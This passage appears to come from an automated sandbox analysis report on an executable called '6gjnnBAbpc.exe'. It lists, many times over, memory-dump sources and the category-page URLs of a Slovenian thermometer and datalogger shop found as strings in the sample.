                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/osnovni-dataloggerji
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/precizni-dataloggerj
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/tehnoloski-data-logg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/veckanalni-in-s-tisk
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/web-brezzicni-wifi-r
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dodatna-oprema-za-termometre-logg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/ex-termometri-in-dataloggerji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/bimetalni-termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/i
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/o
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/p
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 